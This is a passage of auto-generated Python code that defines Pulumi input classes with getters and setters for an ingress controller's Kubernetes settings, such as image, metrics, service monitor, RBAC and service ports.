repository: Optional[pulumi.Input[str]] = None,
run_as_non_root: Optional[pulumi.Input[bool]] = None,
run_as_user: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] repository: for backwards compatibility consider setting the full image url via the repository value below use *either* current default registry/image or repository format or installing will fail.
"""
if allow_privilege_escalation is not None:
pulumi.set(__self__, "allow_privilege_escalation", allow_privilege_escalation)
if digest is not None:
pulumi.set(__self__, "digest", digest)
if image is not None:
pulumi.set(__self__, "image", image)
if pull_policy is not None:
pulumi.set(__self__, "pull_policy", pull_policy)
if read_only_root_filesystem is not None:
pulumi.set(__self__, "read_only_root_filesystem", read_only_root_filesystem)
if registry is not None:
pulumi.set(__self__, "registry", registry)
if repository is not None:
pulumi.set(__self__, "repository", repository)
if run_as_non_root is not None:
pulumi.set(__self__, "run_as_non_root", run_as_non_root)
if run_as_user is not None:
pulumi.set(__self__, "run_as_user", run_as_user)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter(name="allowPrivilegeEscalation")
def allow_privilege_escalation(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "allow_privilege_escalation")
@allow_privilege_escalation.setter
def allow_privilege_escalation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_privilege_escalation", value)
@property
@pulumi.getter
def digest(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "digest")
@digest.setter
def digest(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "digest", value)
@property
@pulumi.getter
def image(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "image")
@image.setter
def image(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image", value)
@property
@pulumi.getter(name="pullPolicy")
def pull_policy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "pull_policy")
@pull_policy.setter
def pull_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pull_policy", value)
@property
@pulumi.getter(name="readOnlyRootFilesystem")
def read_only_root_filesystem(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "read_only_root_filesystem")
@read_only_root_filesystem.setter
def read_only_root_filesystem(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "read_only_root_filesystem", value)
@property
@pulumi.getter
def registry(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "registry")
@registry.setter
def registry(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "registry", value)
@property
@pulumi.getter
def repository(self) -> Optional[pulumi.Input[str]]:
"""
for backwards compatibility consider setting the full image url via the repository value below use *either* current default registry/image or repository format or installing will fail.
"""
return pulumi.get(self, "repository")
@repository.setter
def repository(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repository", value)
@property
@pulumi.getter(name="runAsNonRoot")
def run_as_non_root(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "run_as_non_root")
@run_as_non_root.setter
def run_as_non_root(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "run_as_non_root", value)
@property
@pulumi.getter(name="runAsUser")
def run_as_user(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "run_as_user")
@run_as_user.setter
def run_as_user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "run_as_user", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@pulumi.input_type
class ControllerIngressClassResourceArgs:
def __init__(__self__, *,
controller_value: Optional[pulumi.Input[str]] = None,
default: Optional[pulumi.Input[bool]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] parameters: Parameters is a link to a custom resource containing additional configuration for the controller. This is optional if the controller does not require extra parameters.
"""
if controller_value is not None:
pulumi.set(__self__, "controller_value", controller_value)
if default is not None:
pulumi.set(__self__, "default", default)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="controllerValue")
def controller_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "controller_value")
@controller_value.setter
def controller_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "controller_value", value)
@property
@pulumi.getter
def default(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "default")
@default.setter
def default(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "default", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Parameters is a link to a custom resource containing additional configuration for the controller. This is optional if the controller does not require extra parameters.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class ControllerMetricsPrometheusRulesArgs:
def __init__(__self__, *,
additional_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
namespace: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None):
if additional_labels is not None:
pulumi.set(__self__, "additional_labels", additional_labels)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if rules is not None:
pulumi.set(__self__, "rules", rules)
@property
@pulumi.getter(name="additionalLabels")
def additional_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "additional_labels")
@additional_labels.setter
def additional_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "additional_labels", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "rules", value)
@pulumi.input_type
class ControllerMetricsServiceMonitorArgs:
def __init__(__self__, *,
additional_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
honor_labels: Optional[pulumi.Input[bool]] = None,
job_label: Optional[pulumi.Input[str]] = None,
metric_relabelings: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
namespace: Optional[pulumi.Input[str]] = None,
namespace_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
scrape_interval: Optional[pulumi.Input[str]] = None,
target_labels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] job_label: The label to use to retrieve the job name from.
"""
if additional_labels is not None:
pulumi.set(__self__, "additional_labels", additional_labels)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if honor_labels is not None:
pulumi.set(__self__, "honor_labels", honor_labels)
if job_label is not None:
pulumi.set(__self__, "job_label", job_label)
if metric_relabelings is not None:
pulumi.set(__self__, "metric_relabelings", metric_relabelings)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if namespace_selector is not None:
pulumi.set(__self__, "namespace_selector", namespace_selector)
if scrape_interval is not None:
pulumi.set(__self__, "scrape_interval", scrape_interval)
if target_labels is not None:
pulumi.set(__self__, "target_labels", target_labels)
@property
@pulumi.getter(name="additionalLabels")
def additional_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "additional_labels")
@additional_labels.setter
def additional_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "additional_labels", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="honorLabels")
def honor_labels(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "honor_labels")
@honor_labels.setter
def honor_labels(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "honor_labels", value)
@property
@pulumi.getter(name="jobLabel")
def job_label(self) -> Optional[pulumi.Input[str]]:
"""
The label to use to retrieve the job name from.
"""
return pulumi.get(self, "job_label")
@job_label.setter
def job_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_label", value)
@property
@pulumi.getter(name="metricRelabelings")
def metric_relabelings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "metric_relabelings")
@metric_relabelings.setter
def metric_relabelings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "metric_relabelings", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="namespaceSelector")
def namespace_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "namespace_selector")
@namespace_selector.setter
def namespace_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "namespace_selector", value)
@property
@pulumi.getter(name="scrapeInterval")
def scrape_interval(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scrape_interval")
@scrape_interval.setter
def scrape_interval(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scrape_interval", value)
@property
@pulumi.getter(name="targetLabels")
def target_labels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "target_labels")
@target_labels.setter
def target_labels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "target_labels", value)
@pulumi.input_type
class ControllerMetricsServiceArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
cluster_ip: Optional[pulumi.Input[str]] = None,
external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
external_traffic_policy: Optional[pulumi.Input[str]] = None,
load_balancer_ips: Optional[pulumi.Input[str]] = None,
load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_port: Optional[pulumi.Input[str]] = None,
service_port: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if cluster_ip is not None:
pulumi.set(__self__, "cluster_ip", cluster_ip)
if external_ips is not None:
pulumi.set(__self__, "external_ips", external_ips)
if external_traffic_policy is not None:
pulumi.set(__self__, "external_traffic_policy", external_traffic_policy)
if load_balancer_ips is not None:
pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
if load_balancer_source_ranges is not None:
pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
if node_port is not None:
pulumi.set(__self__, "node_port", node_port)
if service_port is not None:
pulumi.set(__self__, "service_port", service_port)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clusterIP")
def cluster_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cluster_ip")
@cluster_ip.setter
def cluster_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_ip", value)
@property
@pulumi.getter(name="externalIPs")
def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "external_ips")
@external_ips.setter
def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_ips", value)
@property
@pulumi.getter(name="externalTrafficPolicy")
def external_traffic_policy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "external_traffic_policy")
@external_traffic_policy.setter
def external_traffic_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_traffic_policy", value)
@property
@pulumi.getter(name="loadBalancerIPs")
def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "load_balancer_ips")
@load_balancer_ips.setter
def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancer_ips", value)
@property
@pulumi.getter(name="loadBalancerSourceRanges")
def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "load_balancer_source_ranges")
@load_balancer_source_ranges.setter
def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "load_balancer_source_ranges", value)
@property
@pulumi.getter(name="nodePort")
def node_port(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "node_port")
@node_port.setter
def node_port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_port", value)
@property
@pulumi.getter(name="servicePort")
def service_port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "service_port")
@service_port.setter
def service_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "service_port", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerMetricsArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
prometheus_rule: Optional[pulumi.Input['ControllerMetricsPrometheusRulesArgs']] = None,
service: Optional[pulumi.Input['ControllerMetricsServiceArgs']] = None,
service_monitor: Optional[pulumi.Input['ControllerMetricsServiceMonitorArgs']] = None):
"""
:param pulumi.Input[int] port: if this port is changed, change healthz-port: in extraArgs: accordingly.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if port is not None:
pulumi.set(__self__, "port", port)
if prometheus_rule is not None:
pulumi.set(__self__, "prometheus_rule", prometheus_rule)
if service is not None:
pulumi.set(__self__, "service", service)
if service_monitor is not None:
pulumi.set(__self__, "service_monitor", service_monitor)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
if this port is changed, change healthz-port: in extraArgs: accordingly.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="prometheusRule")
def prometheus_rule(self) -> Optional[pulumi.Input['ControllerMetricsPrometheusRulesArgs']]:
return pulumi.get(self, "prometheus_rule")
@prometheus_rule.setter
def prometheus_rule(self, value: Optional[pulumi.Input['ControllerMetricsPrometheusRulesArgs']]):
pulumi.set(self, "prometheus_rule", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input['ControllerMetricsServiceArgs']]:
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input['ControllerMetricsServiceArgs']]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="serviceMonitor")
def service_monitor(self) -> Optional[pulumi.Input['ControllerMetricsServiceMonitorArgs']]:
return pulumi.get(self, "service_monitor")
@service_monitor.setter
def service_monitor(self, value: Optional[pulumi.Input['ControllerMetricsServiceMonitorArgs']]):
pulumi.set(self, "service_monitor", value)
@pulumi.input_type
class ControllerPodSecurityPolicyArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None):
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class ControllerPortArgs:
def __init__(__self__, *,
http: Optional[pulumi.Input[int]] = None,
https: Optional[pulumi.Input[int]] = None):
if http is not None:
pulumi.set(__self__, "http", http)
if https is not None:
pulumi.set(__self__, "https", https)
@property
@pulumi.getter
def http(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "http")
@http.setter
def http(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http", value)
@property
@pulumi.getter
def https(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "https")
@https.setter
def https(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "https", value)
@pulumi.input_type
class ControllerPublishServiceArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
path_override: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] path_override: Allows overriding of the publish service to bind to. Must be <namespace>/<service_name>.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if path_override is not None:
pulumi.set(__self__, "path_override", path_override)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="pathOverride")
def path_override(self) -> Optional[pulumi.Input[str]]:
"""
Allows overriding of the publish service to bind to. Must be <namespace>/<service_name>.
"""
return pulumi.get(self, "path_override")
@path_override.setter
def path_override(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path_override", value)
@pulumi.input_type
class ControllerRBACArgs:
def __init__(__self__, *,
create: Optional[pulumi.Input[bool]] = None,
scope: Optional[pulumi.Input[bool]] = None):
if create is not None:
pulumi.set(__self__, "create", create)
if scope is not None:
pulumi.set(__self__, "scope", scope)
@property
@pulumi.getter
def create(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "create")
@create.setter
def create(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "scope", value)
@pulumi.input_type
class ControllerRollingUpdateArgs:
def __init__(__self__, *,
max_unavailable: Optional[pulumi.Input[int]] = None):
if max_unavailable is not None:
pulumi.set(__self__, "max_unavailable", max_unavailable)
@property
@pulumi.getter(name="maxUnavailable")
def max_unavailable(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_unavailable")
@max_unavailable.setter
def max_unavailable(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_unavailable", value)
@pulumi.input_type
class ControllerScopeArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
namespace: Optional[pulumi.Input[str]] = None):
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class ControllerServiceAccountArgs:
def __init__(__self__, *,
automount_service_account_token: Optional[pulumi.Input[bool]] = None,
create: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
if automount_service_account_token is not None:
pulumi.set(__self__, "automount_service_account_token", automount_service_account_token)
if create is not None:
pulumi.set(__self__, "create", create)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="automountServiceAccountToken")
def automount_service_account_token(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "automount_service_account_token")
@automount_service_account_token.setter
def automount_service_account_token(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "automount_service_account_token", value)
@property
@pulumi.getter
def create(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "create")
@create.setter
def create(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class ControllerServiceInternalArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
external_traffic_policy: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
load_balancer_ips: Optional[pulumi.Input[str]] = None,
load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] external_traffic_policy: Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
:param pulumi.Input[Sequence[pulumi.Input[str]]] load_balancer_source_ranges: Restrict access For LoadBalancer service. Defaults to 0.0.0.0/0.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if external_traffic_policy is not None:
pulumi.set(__self__, "external_traffic_policy", external_traffic_policy)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if load_balancer_ips is not None:
pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
if load_balancer_source_ranges is not None:
pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="externalTrafficPolicy")
def external_traffic_policy(self) -> Optional[pulumi.Input[str]]:
"""
Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
"""
return pulumi.get(self, "external_traffic_policy")
@external_traffic_policy.setter
def external_traffic_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_traffic_policy", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="loadBalancerIPs")
def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "load_balancer_ips")
@load_balancer_ips.setter
def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancer_ips", value)
@property
@pulumi.getter(name="loadBalancerSourceRanges")
def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Restrict access For LoadBalancer service. Defaults to 0.0.0.0/0.
"""
return pulumi.get(self, "load_balancer_source_ranges")
@load_balancer_source_ranges.setter
def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "load_balancer_source_ranges", value)
@pulumi.input_type
class ControllerServiceNodePortsArgs:
def __init__(__self__, *,
http: Optional[pulumi.Input[str]] = None,
https: Optional[pulumi.Input[str]] = None,
tcp: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
udp: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None):
if http is not None:
pulumi.set(__self__, "http", http)
if https is not None:
pulumi.set(__self__, "https", https)
if tcp is not None:
pulumi.set(__self__, "tcp", tcp)
if udp is not None:
pulumi.set(__self__, "udp", udp)
@property
@pulumi.getter
def http(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "http")
@http.setter
def http(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http", value)
@property
@pulumi.getter
def https(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "https")
@https.setter
def https(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "https", value)
@property
@pulumi.getter
def tcp(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "tcp")
@tcp.setter
def tcp(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "tcp", value)
@property
@pulumi.getter
def udp(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "udp")
@udp.setter
def udp(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "udp", value)
@pulumi.input_type
class ControllerServiceArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
cluster_ip: Optional[pulumi.Input[str]] = None,
enable_http: Optional[pulumi.Input[bool]] = None,
enable_https: Optional[pulumi.Input[bool]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
external_traffic_policy: Optional[pulumi.Input[str]] = None,
health_check_node_port: Optional[pulumi.Input[int]] = None,
internal: Optional[pulumi.Input['ControllerServiceInternalArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
load_balancer_ips: Optional[pulumi.Input[str]] = None,
load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_ports: Optional[pulumi.Input['ControllerServiceNodePortsArgs']] = None,
ports: Optional[pulumi.Input['ControllerPortArgs']] = None,
session_affinity: Optional[pulumi.Input[str]] = None,
target_ports: Optional[pulumi.Input['ControllerPortArgs']] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_ips: List of IP addresses at which the controller services are available Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
:param pulumi.Input[str] external_traffic_policy: Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
:param pulumi.Input[int] health_check_node_port: specifies the health check node port (numeric port number) for the service. If healthCheckNodePort isn’t specified, the service controller allocates a port from your cluster’s NodePort range. Ref: https://kubernetes.io/docs/tasks/access-application-cluster/create-external-load-balancer/#preserving-the-client-source-ip
:param pulumi.Input['ControllerServiceInternalArgs'] internal: Enables an additional internal load balancer (besides the external one). Annotations are mandatory for the load balancer to come up. Varies with the cloud service.
:param pulumi.Input[str] session_affinity: Must be either "None" or "ClientIP" if set. Kubernetes will default to "None". Ref: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if cluster_ip is not None:
pulumi.set(__self__, "cluster_ip", cluster_ip)
if enable_http is not None:
pulumi.set(__self__, "enable_http", enable_http)
if enable_https is not None:
pulumi.set(__self__, "enable_https", enable_https)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if external_ips is not None:
pulumi.set(__self__, "external_ips", external_ips)
if external_traffic_policy is not None:
